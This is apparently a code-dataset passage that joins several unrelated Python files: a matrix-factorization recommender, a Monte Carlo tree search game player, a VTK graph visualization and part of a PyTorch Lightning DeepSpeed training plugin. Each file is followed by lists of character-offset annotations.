return beta * (pa / recovery_rate_asymptomatic + (isolation_ratio * (1-pa-ps) / recovery_rate_mild) + (isolation_ratio * ps / recovery_rate_severe))
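    # Reference formula for the method above (added comment): with r the
    # isolation_ratio and pa/ps the asymptomatic/severe probabilities,
    #   R0 = beta * ( pa/gamma_asymptomatic + r*(1 - pa - ps)/gamma_mild + r*ps/gamma_severe )
    # where gamma_severe = (1 - proba_icu)*symptoms_to_hospital_rate + proba_icu*symptoms_to_icu_rate.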
| [
[
[
63,
81
],
[
98,
116
]
],
[
[
90,
97
]
]
] |
from lib.utils import top_k
from TraditionalRecommenderSystems.MatrixFactorization.Models import BaseMF
import numpy as np
import pandas as pd
import torch
from torch import nn
import torch.utils.data as data
from tqdm import tqdm
class MatrixFactorization(object):
def __init__(self, user_item_pairs, user_list, item_list, nb_factor=40, drop_rate=0.5, batch_size=32, lr=1e-1,
optimizer=torch.optim.Adam, loss_func=nn.MSELoss(reduction='mean'), sparse=False,
weight_decay=0., device='cuda', pro_process=None):
"""
Matrix Factorization based on Pytorch.
:param user_item_pairs: list. [(user, item, rating)].
:param user_list: list. The list of all the users (with no repeat).
:param item_list: list. The list of all the items (with no repeat).
:param nb_factor: int. The number of factors.
:param drop_rate: float 0~1. Drop rate of the dropout layer.
:param batch_size: int. Batch size of training
:param lr: float. Learning rate.
:param optimizer: torch.optim. Optimizer utilized to train the model.
:param loss_func: torch.nn.*Loss. Loss function of training.
:param sparse: boolean. The gradient requires to be sparse or not.
:param weight_decay: float. L2 regularization.
:param device: 'cpu' or 'cuda'.
:param pro_process: nn.Module.
"""
self.user_item_pairs = pd.DataFrame(user_item_pairs)
# build index-user, index-item
self.index_2_user = np.array(user_list)
self.index_2_item = np.array(item_list)
assert len(self.index_2_user) == len(set(self.index_2_user))
assert len(self.index_2_item) == len(set(self.index_2_item))
self.user_2_index = {self.index_2_user[i]: i for i in range(len(self.index_2_user))}
self.item_2_index = {self.index_2_item[i]: i for i in range(len(self.index_2_item))}
self.nb_user, self.nb_item = len(user_list), len(item_list)
# prepare training loader
train_user_indices = torch.from_numpy(self.users_to_indices(self.user_item_pairs[0].values)).long()
train_item_indices = torch.from_numpy(self.items_to_indices(self.user_item_pairs[1].values)).long()
train_ratings = torch.from_numpy(self.user_item_pairs[2].values.reshape(-1, 1)).float()
self.train_data_loader = data.DataLoader(data.TensorDataset(train_user_indices, train_item_indices,
train_ratings), batch_size=batch_size, shuffle=True)
# build model
self.nb_factor = nb_factor
self.lr = lr
self.batch_size = batch_size
self.loss_func = loss_func
self.weight_decay = weight_decay
self.device = device
self.sparse = sparse
self.process = pro_process
self.model = BaseMF(self.nb_user, self.nb_item, nb_factor, drop_rate, sparse, pro_process=self.process).to(device)
self.optimizer = optimizer(self.model.parameters(), lr=lr, weight_decay=weight_decay)
# build history rating matrix
self.pred_rating_matrix = None
self.history_rating_matrix = None
self.update_history_rating_matrix()
def train(self, epochs, test_data=None, test_epoch_step=1):
"""
Train the model.
:param epochs: int. The epochs of training.
:param test_data: [(user, item, rating)]. None if no validation is applied.
:param test_epoch_step: int. The step of validation.
        :return: (list of training loss, list of test loss); the test-loss list stays empty if no validation data is supplied.
"""
hist_train_loss, hist_test_loss = [], []
if test_data is not None:
test_data = pd.DataFrame(test_data)
for epoch in range(epochs):
print('Epoch-{}/{}:'.format(epoch+1, epochs))
self.model.train()
train_loss = self.train_epoch()
hist_train_loss.append(train_loss)
if (test_data is not None) and (epoch % test_epoch_step == 0):
self.model.eval()
test_loss = self.eval(test_data.iloc[:, [0, 1]].values, ground_truth=test_data[2].values)
hist_test_loss.append(test_loss)
print('training loss = {}, test loss = {}'.format(train_loss, test_loss))
else:
print('training loss = {}'.format(train_loss))
self.update_pred_rating_matrix()
return hist_train_loss, hist_test_loss
def train_epoch(self):
"""
:return: training loss.
"""
self.model.train()
epoch_loss = 0.
for id_user, id_item, id_rating in tqdm(self.train_data_loader):
batch_loss = self.train_on_batch(id_user, id_item, id_rating)
epoch_loss += batch_loss
epoch_loss /= len(self.train_data_loader)
return epoch_loss
def train_on_batch(self, user_indices, item_indices, ratings):
users, items, ratings = user_indices.to(self.device), item_indices.to(self.device), ratings.to(self.device)
self.optimizer.zero_grad()
outputs = self.model(users, items)
loss = self.loss_func(outputs, ratings)
loss.backward()
self.optimizer.step()
return loss.item()
def eval(self, user_item_pairs, ground_truth, batch_size=100):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item).
:param ground_truth: the ground truth rating.
:param batch_size: batch_size of predicting.
:return: ratings. size=[nb_pairs]
"""
self.model.eval()
outputs = self.predict(user_item_pairs, batch_size=batch_size).ravel()
loss = np.mean((outputs-ground_truth.ravel())**2)
return loss
def predict(self, user_item_pairs, batch_size=100):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item)
:param batch_size: batch_size of predicting.
:return: ratings. size=[nb_pairs]
"""
pairs = pd.DataFrame(user_item_pairs)
user_indices = self.users_to_indices(pairs[0].values)
item_indices = self.items_to_indices(pairs[1].values)
self.model.eval()
outputs = []
with torch.no_grad():
start_id = 0
end_id = min(batch_size, len(pairs))
while start_id < len(pairs):
outputs.append(self.predict_on_batch(user_indices[start_id:end_id], item_indices[start_id:end_id]))
start_id += batch_size
end_id = min(start_id+batch_size, len(pairs))
return np.concatenate(outputs, axis=0)
def predict_on_batch(self, user_indices, item_indices):
users = torch.from_numpy(user_indices).long().to(self.device)
items = torch.from_numpy(item_indices).long().to(self.device)
outputs = self.model(users, items)
return outputs.data.cpu().numpy()
def update_history_rating_matrix(self):
"""
Update history rating matrix.
:return: self.
"""
self.history_rating_matrix = pd.DataFrame(index=self.index_2_user, columns=self.index_2_item)
for i, j, k in self.user_item_pairs.values:
if i and j and k:
self.history_rating_matrix[j][i] = k
return self
def update_pred_rating_matrix(self):
"""
Update prediction rating matrix.
:return: self.
"""
pred_matrix = self.model.get_rating_matrix().data.cpu().numpy()
self.pred_rating_matrix = np.where(self.history_rating_matrix.isna(), pred_matrix, np.nan)
return self
# def get_single_rating(self, i, j):
# return self.pred_rating_matrix[i][j] if not np.isnan(self.pred_rating_matrix[i][j])\
# else self.history_rating_matrix.values[i][j]
#
# def predict_ratings_with_matrix(self, user_item_pairs):
# """
# Predict the ratings of the pairs of (user, item).
# :param user_item_pairs: list of (user, item)
# :return: ratings. size=[nb_pairs]
# """
# pairs = pd.DataFrame(user_item_pairs)
# users = self.users_to_indices(pairs[0])
# items = self.items_to_indices(pairs[1])
# return np.array([self.get_single_rating(users[i], items[i]) for i in range(len(user_item_pairs))])
def predict_ratings(self, user_item_pairs):
"""
Predict the ratings of the pairs of (user, item).
:param user_item_pairs: list of (user, item)
:return: ratings. size=[nb_pairs]
"""
return self.predict(user_item_pairs).ravel()
def recommend(self, users, nb_recommendation):
"""
return the recommendations and their corresponding ratings.
:param users: array of users
:param nb_recommendation: The number of items to be recommended.
:return: Indices of recommended items and their corresponding scores.
"""
user_indices = self.users_to_indices(users)
id_recommend, rating_recommend = top_k(np.where(np.isnan(self.pred_rating_matrix[user_indices, :]),
-np.inf, self.pred_rating_matrix[user_indices, :]),
k=nb_recommendation, axis=-1, reverse=True, sort=True)
return id_recommend, rating_recommend
def users_to_indices(self, users):
return np.array([self.user_2_index[user] for user in users]).ravel()
def indices_to_users(self, indices):
return self.index_2_user[np.array(indices).ravel()]
def items_to_indices(self, items):
return np.array([self.item_2_index[item] for item in items]).ravel()
def indices_to_items(self, indices):
return self.index_2_item[np.array(indices).ravel()]
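# Minimal usage sketch (illustrative only; the users, items and ratings below are
# made up and not part of the original module):
#   pairs = [('u1', 'i1', 5.0), ('u2', 'i1', 4.0), ('u2', 'i2', 3.0)]
#   mf = MatrixFactorization(pairs, user_list=['u1', 'u2'], item_list=['i1', 'i2'],
#                            nb_factor=8, batch_size=2, device='cpu')
#   mf.train(epochs=5)
#   item_ids, scores = mf.recommend(['u1'], nb_recommendation=1)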
| [
[
[
22,
27
],
[
9186,
9191
]
],
[
[
97,
103
],
[
2881,
2887
]
],
[
[
111,
122
],
[
1539,
1541
],
[
1587,
1589
],
[
5804,
5806
],
[
6748,
6750
],
[
7689,
7691
],
[
7746,
7748
],
[
9192,
9194
],
[
9201,
9203
],
[
9310,
9312
],
[
9564,
9566
],
[
9701,
9703
],
[
9783,
9785
],
[
9920,
9922
]
],
[
[
130,
142
],
[
1441,
1443
],
[
3782,
3784
],
[
6170,
6172
],
[
7233,
7235
]
],
[
[
150,
155
],
[
410,
415
],
[
2063,
2068
],
[
2171,
2176
],
[
2274,
2279
],
[
6384,
6389
],
[
6857,
6862
],
[
6927,
6932
]
],
[
[
174,
176
],
[
438,
440
]
],
[
[
184,
208
],
[
2379,
2383
],
[
2395,
2399
]
],
[
[
226,
230
],
[
4723,
4727
]
],
[
[
239,
258
]
]
] |
import numpy as np
import copy
def softmax(x):
probs = np.exp(x - np.max(x))
probs /= np.sum(probs)
return probs
class TreeNode(object):
"""A node in the MCTS tree. Each node keeps track of its own value Q, prior probability P, and
its visit-count-adjusted prior score u.
"""
def __init__(self, parent, prior_p):
self._parent = parent
self._children = {} # a map from action to TreeNode
self._n_visits = 0
self._Q = 0
self._u = 0
self._P = prior_p
def expand(self, action_priors):
"""Expand tree by creating new children.
action_priors -- output from policy function - a list of tuples of actions
and their prior probability according to the policy function.
"""
for action, prob in action_priors:
if action not in self._children:
self._children[action] = TreeNode(self, prob)
def select(self, c_puct):
"""Select action among children that gives maximum action value, Q plus bonus u(P).
Returns:
A tuple of (action, next_node)
"""
return max(self._children.items(), key=lambda act_node: act_node[1].get_value(c_puct))
def update(self, leaf_value):
"""Update node values from leaf evaluation.
Arguments:
leaf_value -- the value of subtree evaluation from the current player's perspective.
"""
# Count visit.
self._n_visits += 1
# Update Q, a running average of values for all visits.
self._Q += 1.0*(leaf_value - self._Q) / self._n_visits
def update_recursive(self, leaf_value):
"""Like a call to update(), but applied recursively for all ancestors.
"""
# If it is not root, this node's parent should be updated first.
if self._parent:
self._parent.update_recursive(-leaf_value)
self.update(leaf_value)
def get_value(self, c_puct):
"""Calculate and return the value for this node: a combination of leaf evaluations, Q, and
this node's prior adjusted for its visit count, u
c_puct -- a number in (0, inf) controlling the relative impact of values, Q, and
prior probability, P, on this node's score.
"""
self._u = c_puct * self._P * np.sqrt(self._parent._n_visits) / (1 + self._n_visits)
return self._Q + self._u
def is_leaf(self):
"""Check if leaf node (i.e. no nodes below this have been expanded).
"""
return self._children == {}
def is_root(self):
return self._parent is None
class MCTS(object):
"""A simple implementation of Monte Carlo Tree Search.
"""
def __init__(self, policy_value_fn, c_puct=5, n_playout=10000):
"""Arguments:
policy_value_fn -- a function that takes in a board state and outputs a list of (action, probability)
tuples and also a score in [-1, 1] (i.e. the expected value of the end game score from
the current player's perspective) for the current player.
c_puct -- a number in (0, inf) that controls how quickly exploration converges to the
maximum-value policy, where a higher value means relying on the prior more
"""
self._root = TreeNode(None, 1.0)
self._policy = policy_value_fn
self._c_puct = c_puct
self._n_playout = n_playout
def _playout(self, state):
"""Run a single playout from the root to the leaf, getting a value at the leaf and
propagating it back through its parents. State is modified in-place, so a copy must be
provided.
Arguments:
state -- a copy of the state.
"""
node = self._root
while(1):
if node.is_leaf():
break
# Greedily select next move.
action, node = node.select(self._c_puct)
state.do_move(action)
# Evaluate the leaf using a network which outputs a list of (action, probability)
# tuples p and also a score v in [-1, 1] for the current player.
action_probs, leaf_value = self._policy(state)
# Check for end of game.
end, winner = state.game_end()
if not end:
node.expand(action_probs)
else:
# for end state,return the "true" leaf_value
if winner == -1: # tie
leaf_value = 0.0
else:
leaf_value = 1.0 if winner == state.get_current_player() else -1.0
# Update value and visit count of nodes in this traversal.
node.update_recursive(-leaf_value)
def get_move_probs(self, state, temp=1e-3):
"""Runs all playouts sequentially and returns the available actions and their corresponding probabilities
Arguments:
state -- the current state, including both game state and the current player.
temp -- temperature parameter in (0, 1] that controls the level of exploration
Returns:
the available actions and the corresponding probabilities
"""
for n in range(self._n_playout):
state_copy = copy.deepcopy(state)
self._playout(state_copy)
# calc the move probabilities based on the visit counts at the root node
act_visits = [(act, node._n_visits) for act, node in self._root._children.items()]
acts, visits = zip(*act_visits)
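        # Added note on the line below: softmax(log(visits)/temp) normalizes
        # visits**(1/temp), so temp -> 0 approaches picking the most-visited move
        # while temp = 1 samples moves in proportion to their visit counts.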
act_probs = softmax(1.0/temp * np.log(np.array(visits) + 1e-10))
return acts, act_probs
def update_with_move(self, last_move):
"""Step forward in the tree, keeping everything we already know about the subtree.
"""
if last_move in self._root._children:
self._root = self._root._children[last_move]
self._root._parent = None
else:
self._root = TreeNode(None, 1.0)
def __str__(self):
return "MCTS"
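# Note on the expected interface (added comment, inferred from the calls this
# module makes): the board/state objects handed to MCTS and MCTSPlayer are
# assumed to expose availables, width, height, do_move(move),
# game_end() -> (end, winner) and get_current_player().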
class MCTSPlayer(object):
"""AI player based on MCTS"""
def __init__(self, policy_value_function, c_puct=5, n_playout=2000, is_selfplay=0):
self.mcts = MCTS(policy_value_function, c_puct, n_playout)
self._is_selfplay = is_selfplay
def set_player_ind(self, p):
self.player = p
def reset_player(self):
self.mcts.update_with_move(-1)
def get_action(self, board, temp=1e-3, return_prob=0):
sensible_moves = board.availables
move_probs = np.zeros(board.width*board.height) # the pi vector returned by MCTS as in the alphaGo Zero paper
if len(sensible_moves) > 0:
acts, probs = self.mcts.get_move_probs(board, temp)
move_probs[list(acts)] = probs
if self._is_selfplay:
# add Dirichlet Noise for exploration (needed for self-play training)
move = np.random.choice(acts, p=0.75*probs + 0.25*np.random.dirichlet(0.3*np.ones(len(probs))))
self.mcts.update_with_move(move) # update the root node and reuse the search tree
else:
# with the default temp=1e-3, this is almost equivalent to choosing the move with the highest prob
move = np.random.choice(acts, p=probs)
# reset the root node
self.mcts.update_with_move(-1)
# location = board.move_to_location(move)
# print("AI move: %d,%d\n" % (location[0], location[1]))
if return_prob:
return move, move_probs
else:
return move
else:
print("WARNING: the board is full")
def __str__(self):
return "MCTS {}".format(self.player) | [
[
[
7,
18
],
[
62,
64
],
[
73,
75
],
[
97,
99
],
[
2325,
2327
],
[
5531,
5533
],
[
5538,
5540
],
[
6525,
6527
],
[
6917,
6919
],
[
6960,
6962
],
[
6984,
6986
],
[
7264,
7266
]
],
[
[
26,
30
],
[
5218,
5222
]
],
[
[
38,
45
],
[
5512,
5519
]
],
[
[
135,
143
],
[
915,
923
],
[
3296,
3304
],
[
5940,
5948
]
],
[
[
2630,
2634
],
[
6184,
6188
]
],
[
[
6022,
6032
]
]
] |
#!/usr/bin/env python
from vtk import *
source = vtkRandomGraphSource()
source.SetNumberOfVertices(15)
source.SetStartWithTree(True)
source.SetIncludeEdgeWeights(True)
bfs = vtkBoostBreadthFirstSearch()
bfs.AddInputConnection(source.GetOutputPort())
bfs.SetOriginVertex(0)
view = vtkGraphLayoutView()
view.AddRepresentationFromInputConnection(bfs.GetOutputPort())
view.SetVertexLabelArrayName("BFS")
view.SetVertexLabelVisibility(True)
view.SetVertexColorArrayName("BFS")
view.SetColorVertices(True)
view.SetEdgeColorArrayName("edge weight")
view.SetColorEdges(True)
view.SetLayoutStrategyToSimple2D()
view.SetVertexLabelFontSize(20)
theme = vtkViewTheme.CreateNeonTheme()
theme.SetLineWidth(5)
theme.SetPointSize(10)
view.ApplyViewTheme(theme)
theme.FastDelete()
view.GetRenderWindow().SetSize(600, 600)
view.ResetCamera()
view.Render()
view.GetInteractor().Start()
| [
[
[
39,
40
],
[
53,
73
],
[
184,
210
],
[
295,
313
],
[
669,
681
]
],
[
[
44,
50
],
[
77,
83
],
[
109,
115
],
[
140,
146
],
[
237,
243
]
],
[
[
178,
181
],
[
214,
217
],
[
262,
265
],
[
359,
362
]
],
[
[
288,
292
],
[
317,
321
],
[
381,
385
],
[
418,
422
],
[
455,
459
],
[
492,
496
],
[
521,
525
],
[
564,
568
],
[
590,
594
],
[
626,
630
],
[
748,
752
],
[
800,
804
],
[
842,
846
],
[
862,
866
],
[
879,
883
]
],
[
[
661,
666
],
[
701,
706
],
[
724,
729
],
[
768,
773
],
[
776,
781
]
]
] |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import json
import logging
import os
import platform
from collections import OrderedDict
from pathlib import Path
from typing import Any, Callable, Dict, Generator, List, Mapping, Optional, Tuple, Union
import torch
from torch.optim import Optimizer
import pytorch_lightning as pl
from pytorch_lightning.overrides.base import _LightningModuleWrapperBase
from pytorch_lightning.plugins.environments.cluster_environment import ClusterEnvironment
from pytorch_lightning.plugins.io.checkpoint_plugin import CheckpointIO
from pytorch_lightning.plugins.training_type.ddp import DDPPlugin
from pytorch_lightning.trainer.optimizers import _get_default_scheduler_config
from pytorch_lightning.trainer.states import TrainerFn
from pytorch_lightning.utilities import AMPType
from pytorch_lightning.utilities.apply_func import apply_to_collection
from pytorch_lightning.utilities.distributed import log, rank_zero_info, rank_zero_only
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.imports import _DEEPSPEED_AVAILABLE
from pytorch_lightning.utilities.seed import reset_seed
from pytorch_lightning.utilities.types import _PATH, LRSchedulerTypeTuple
from pytorch_lightning.utilities.warnings import rank_zero_warn, WarningCache
warning_cache = WarningCache()
if _DEEPSPEED_AVAILABLE:
import deepspeed
def remove_module_hooks(model: torch.nn.Module) -> None:
# todo (tchaton) awaiting this feature to move upstream to DeepSpeed
for module in model.modules():
module._backward_hooks = OrderedDict()
module._is_full_backward_hook = None
module._forward_hooks = OrderedDict()
module._forward_pre_hooks = OrderedDict()
module._state_dict_hooks = OrderedDict()
module._load_state_dict_pre_hooks = OrderedDict()
class LightningDeepSpeedModule(_LightningModuleWrapperBase):
def __init__(self, pl_module: "pl.LightningModule", precision: int) -> None:
super().__init__(pl_module)
self.precision = precision
def forward(self, *inputs, **kwargs):
if self.precision == 16:
inputs = self._move_float_tensors_to_half(inputs)
return super().forward(*inputs, **kwargs)
@staticmethod
def batch_to(data):
return data.half()
def _move_float_tensors_to_half(self, batch: Any):
batch = apply_to_collection(batch, (torch.FloatTensor, torch.cuda.FloatTensor), function=self.batch_to)
return batch
class DeepSpeedPlugin(DDPPlugin):
distributed_backend = "deepspeed"
DEEPSPEED_ENV_VAR = "PL_DEEPSPEED_CONFIG_PATH"
def __init__(
self,
zero_optimization: bool = True,
stage: int = 2,
remote_device: str = "cpu",
offload_optimizer: bool = False,
offload_parameters: bool = False,
offload_params_device: str = "cpu",
nvme_path: str = "/local_nvme",
params_buffer_count: int = 5,
params_buffer_size: int = 1e8,
max_in_cpu: int = 1e9,
offload_optimizer_device: str = "cpu",
optimizer_buffer_count: int = 4,
block_size: int = 1048576,
queue_depth: int = 8,
single_submit: bool = False,
overlap_events: bool = True,
thread_count: int = 1,
pin_memory: bool = False,
sub_group_size: int = 1e12,
contiguous_gradients: bool = True,
overlap_comm: bool = True,
allgather_partitions: bool = True,
reduce_scatter: bool = True,
allgather_bucket_size: int = 2e8,
reduce_bucket_size: int = 2e8,
zero_allow_untested_optimizer: bool = True,
logging_batch_size_per_gpu: Union[str, int] = "auto",
config: Optional[Union[Path, str, dict]] = None,
logging_level: int = logging.WARN,
num_nodes: Optional[int] = None,
parallel_devices: Optional[List[torch.device]] = None,
cluster_environment: Optional[ClusterEnvironment] = None,
loss_scale: float = 0,
initial_scale_power: int = 16,
loss_scale_window: int = 1000,
hysteresis: int = 2,
min_loss_scale: int = 1,
partition_activations: bool = False,
cpu_checkpointing: bool = False,
contiguous_memory_optimization: bool = False,
synchronize_checkpoint_boundary: bool = False,
load_full_weights: bool = False,
partition_module: bool = True,
) -> None:
"""Provides capabilities to run training using the DeepSpeed library, with training optimizations for large
billion parameter models. `For more information: https://pytorch-
lightning.readthedocs.io/en/latest/advanced/multi_gpu.html#deepspeed`.
.. warning:: ``DeepSpeedPlugin`` is in beta and subject to change.
Defaults have been set to enable ZeRO-Offload and some have been taken from the link below.
These defaults have been set generally, but may require tuning for optimum performance based on your model size.
`For more information: https://www.deepspeed.ai/docs/config-json/#zero-optimizations-for-fp16-training`.
Arguments:
zero_optimization: Enable ZeRO optimization. This is only compatible with precision=16.
stage: Different stages of the ZeRO Optimizer. 0 is disabled,
1 is optimizer state partitioning, 2 is optimizer+gradient state partitioning,
3 is optimizer+gradient_parameter partitioning using the infinity engine.
remote_device: Device to instantiate the model on initially (``cpu`` or ``nvme``).
offload_optimizer: Enable offloading optimizer memory and computation to CPU or NVMe
based on ``offload_optimizer_device``.
            offload_parameters: When using ZeRO Stage 3, enable offloading parameter memory and computation
to CPU or NVMe based on ``offload_params_device``.
            offload_params_device: When offloading parameters, choose the device to offload to, ``cpu`` or ``nvme``.
            offload_optimizer_device: When offloading optimizer state, choose the device to offload to,
``cpu`` or ``nvme``.
params_buffer_count: Number of buffers in buffer pool for
parameter offloading when ``offload_params_device`` is ``nvme``.
params_buffer_size: Size of buffers in buffer pool for parameter offloading
when ``offload_params_device`` is ``nvme``.
max_in_cpu: Number of parameter elements to maintain in CPU memory when offloading to NVMe is enabled.
nvme_path: Filesystem path for NVMe device for optimizer/parameter state offloading.
optimizer_buffer_count: Number of buffers in buffer pool for optimizer state offloading
                when ``offload_optimizer_device`` is set to ``nvme``.
This should be at least the number of states maintained per parameter by the optimizer.
For example, Adam optimizer has 4 states (parameter, gradient, momentum, and variance).
block_size: When using NVMe Offloading, the I/O block size in bytes.
queue_depth: When using NVMe Offloading, the I/O queue depth.
single_submit: When using NVMe Offloading,
submit requests to storage device as multiple individual requests,
as opposed to one block of requests.
overlap_events: When using NVMe Offloading,
submit requests to storage device in an overlapped fashion
without waiting for completion of earlier requests.
thread_count: When using NVMe Offloading,
Intra-request parallelism for each read/write submitted by a user thread.
pin_memory: When using ZeRO stage 3, pin optimizer state memory on CPU.
This could boost throughput at the cost of extra memory overhead.
sub_group_size: When using ZeRO stage 3, defines the number of parameters
within a sub group to offload at a time.
Smaller numbers require more communication, but improve memory efficiency.
contiguous_gradients: Copies gradients to a continuous buffer as they are produced.
Avoids memory fragmentation during backwards. Useful when training large models.
overlap_comm: Overlap the reduction (synchronization) of gradients with the backwards computation.
This is a speed optimization when training across multiple GPUs/machines.
allgather_partitions: All gather updated parameters at the end of training step,
instead of using a series of broadcast collectives.
reduce_scatter: Use reduce/scatter instead of allreduce to average gradients.
allgather_bucket_size: Number of elements to allgather at once.
Used to limit the memory required for larger model sizes, with a tradeoff with speed.
reduce_bucket_size: Number of elements to reduce at once.
Used to limit the memory required for larger model sizes, with a tradeoff with speed.
zero_allow_untested_optimizer: Allow untested optimizers to be used with ZeRO. Currently only Adam is a
DeepSpeed supported optimizer when using ZeRO.
logging_batch_size_per_gpu: Config used in DeepSpeed to calculate verbose timing for logging
on a per sample per second basis (only displayed if logging=logging.INFO).
If set to "auto", the plugin tries to infer this from
the train DataLoader's BatchSampler, else defaults to 1.
To obtain accurate logs when using datasets that do not support batch samplers,
set this to the actual per gpu batch size (trainer.batch_size).
config: Pass in a deepspeed formatted config dict,
or path to a deepspeed config: https://www.deepspeed.ai/docs/config-json.
All defaults will be ignored if a config is passed in.
logging_level: Set logging level for deepspeed.
loss_scale: Loss scaling value for FP16 training.
0.0 results in dynamic loss scaling, otherwise static.
initial_scale_power: Power of the initial dynamic loss scale value. Loss scale is computed
by ``2^initial_scale_power``.
loss_scale_window: Window in which to raise/lower the dynamic FP16 loss scaling value.
hysteresis: FP16 Delay shift in Dynamic Loss scaling.
min_loss_scale: The minimum FP16 dynamic loss scaling value.
partition_activations: Enables partition activation when used with ZeRO stage 3 and model parallelism.
Still requires you to wrap your forward functions in deepspeed.checkpointing.checkpoint.
See `deepspeed tutorial
<https://www.deepspeed.ai/tutorials/megatron/#deepspeed-activation-checkpoints-optional>`_.
cpu_checkpointing: Offloads partitioned activations to CPU if ``partition_activations`` is enabled.
contiguous_memory_optimization: Copies partitioned activations so that they are contiguous in memory.
Not supported by all models.
synchronize_checkpoint_boundary: Insert :func:`torch.cuda.synchronize` at each checkpoint boundary.
load_full_weights: True when loading a single checkpoint file containing the model state dict
when using ZeRO Stage 3. This differs from the DeepSpeed checkpoint which contains shards
per worker.
partition_module: When True, partitions the ``LightningModule`` across devices when using ZeRO Stage 3.
This is the default behaviour to ensure that the entire module is appropriately initialized
for DeepSpeed. When False we do not explicitly convert the model, which is fine if NO layers
or ALL layers are defined in ``configure_sharded_model``. This is useful for layers such as
``torch.nn.RNN`` which do internal logic when moving to device.
"""
if not _DEEPSPEED_AVAILABLE:
raise MisconfigurationException(
"To use the DeepSpeed plugin, you must have DeepSpeed installed. pip install deepspeed"
)
super().__init__(
parallel_devices=parallel_devices,
num_nodes=num_nodes,
cluster_environment=cluster_environment,
)
self.config = self._load_config(config)
if self.config is None:
# User has not overridden config, set defaults
self.config = self._create_default_config(
zero_optimization,
zero_allow_untested_optimizer,
logging_batch_size_per_gpu,
offload_optimizer=offload_optimizer,
offload_parameters=offload_parameters,
nvme_path=nvme_path,
offload_params_device=offload_params_device,
params_buffer_count=params_buffer_count,
params_buffer_size=params_buffer_size,
max_in_cpu=max_in_cpu,
pin_memory=pin_memory,
offload_optimizer_device=offload_optimizer_device,
optimizer_buffer_count=optimizer_buffer_count,
block_size=block_size,
queue_depth=queue_depth,
single_submit=single_submit,
overlap_events=overlap_events,
thread_count=thread_count,
partition_activations=partition_activations,
cpu_checkpointing=cpu_checkpointing,
contiguous_memory_optimization=contiguous_memory_optimization,
synchronize_checkpoint_boundary=synchronize_checkpoint_boundary,
stage=stage,
contiguous_gradients=contiguous_gradients,
overlap_comm=overlap_comm,
allgather_partitions=allgather_partitions,
reduce_scatter=reduce_scatter,
allgather_bucket_size=allgather_bucket_size,
reduce_bucket_size=reduce_bucket_size,
sub_group_size=sub_group_size,
)
self._config_initialized = False
deepspeed.utils.logging.logger.setLevel(logging_level)
self.remote_device = remote_device
self.load_full_weights = load_full_weights
self.partition_module = partition_module
# default FP16 parameters.
self.loss_scale = loss_scale
self.initial_scale_power = initial_scale_power
self.loss_scale_window = loss_scale_window
self.hysteresis = hysteresis
self.min_loss_scale = min_loss_scale
def _load_config(self, config):
if config is None and self.DEEPSPEED_ENV_VAR in os.environ:
rank_zero_info(f"Loading DeepSpeed config from set {self.DEEPSPEED_ENV_VAR} environment variable")
config = os.environ[self.DEEPSPEED_ENV_VAR]
if isinstance(config, (str, Path)):
if not os.path.isfile(config):
raise MisconfigurationException(
f"You passed in a path to a DeepSpeed config but the path does not exist: {config}"
)
with open(config) as f:
config = json.load(f)
return config
def setup_distributed(self):
reset_seed()
# determine which process we are and world size
self.set_world_ranks()
self._init_deepspeed_distributed()
if not self._config_initialized:
self._format_config()
self._config_initialized = True
def _init_deepspeed_distributed(self) -> None:
if platform.system() != "Windows":
# do not set env variables on windows, allow deepspeed to control setup
self._set_node_environment_variables()
log.info(
"initializing deepspeed distributed: "
f"GLOBAL_RANK: {self.global_rank}, "
f"MEMBER: {self.global_rank + 1}/{self.world_size}"
)
deepspeed.init_distributed(
self.torch_distributed_backend, distributed_port=self.cluster_environment.master_port()
)
def _set_node_environment_variables(self) -> None:
os.environ["MASTER_ADDR"] = self.cluster_environment.master_address()
os.environ["MASTER_PORT"] = str(self.cluster_environment.master_port())
os.environ["RANK"] = str(self.global_rank)
os.environ["WORLD_SIZE"] = str(self.world_size)
os.environ["LOCAL_RANK"] = str(self.local_rank)
@property
def restore_checkpoint_after_pre_dispatch(self) -> bool:
return True
def pre_dispatch(self):
self.init_deepspeed()
self.barrier()
def init_deepspeed(self):
accumulation_scheduler = self.lightning_module.trainer.accumulation_scheduler
if accumulation_scheduler.epochs != [0]:
raise MisconfigurationException(
"DeepSpeed currently does not support different `accumulate_grad_batches` at different epochs."
)
precision = self.lightning_module.trainer.accelerator.precision
model = LightningDeepSpeedModule(pl_module=self.model, precision=precision)
if self.zero_stage_3 and self.partition_module:
# Ensure the entire model has been moved to the appropriate device
dtype = torch.float16 if self.precision in (16, "mixed") else torch.float32
deepspeed.zero.Init(
module=model, remote_device=self.remote_device, pin_memory=True, config=self.config, dtype=dtype
)
if self.lightning_module.trainer and self.lightning_module.trainer.training:
self._initialize_deepspeed_train(model)
else:
self._initialize_deepspeed_inference(model)
def _init_optimizers(self) -> Tuple[Optimizer, Optional[Union[LRSchedulerTypeTuple]], Optional[int]]:
optimizers, schedulers, optimizer_frequencies = self.lightning_module.trainer.init_optimizers(
self.lightning_module
)
if len(optimizers) > 1 or len(schedulers) > 1:
raise MisconfigurationException(
"DeepSpeed currently only supports single optimizer, single optional scheduler."
)
return (
optimizers[0],
schedulers[0] if schedulers else _get_default_scheduler_config(),
optimizer_frequencies[0] if optimizer_frequencies else None,
)
@property
def zero_stage_3(self) -> bool:
return self.config.get("zero_optimization") and self.config.get("zero_optimization").get("stage") == 3
def _initialize_deepspeed_train(self, model):
if "optimizer" in self.config:
optimizer, lr_scheduler = None, _get_default_scheduler_config()
else:
rank_zero_info(
"You have not specified an optimizer or scheduler within the DeepSpeed config."
"Using `configure_optimizers` to define optimizer and scheduler."
)
optimizer, lr_scheduler, _ = self._init_optimizers()
scheduler = lr_scheduler["scheduler"]
model_parameters = filter(lambda p: p.requires_grad, self.model.parameters())
model, deepspeed_optimizer, _, deepspeed_scheduler = deepspeed.initialize(
config=self.config,
model=model,
model_parameters=model_parameters,
optimizer=optimizer,
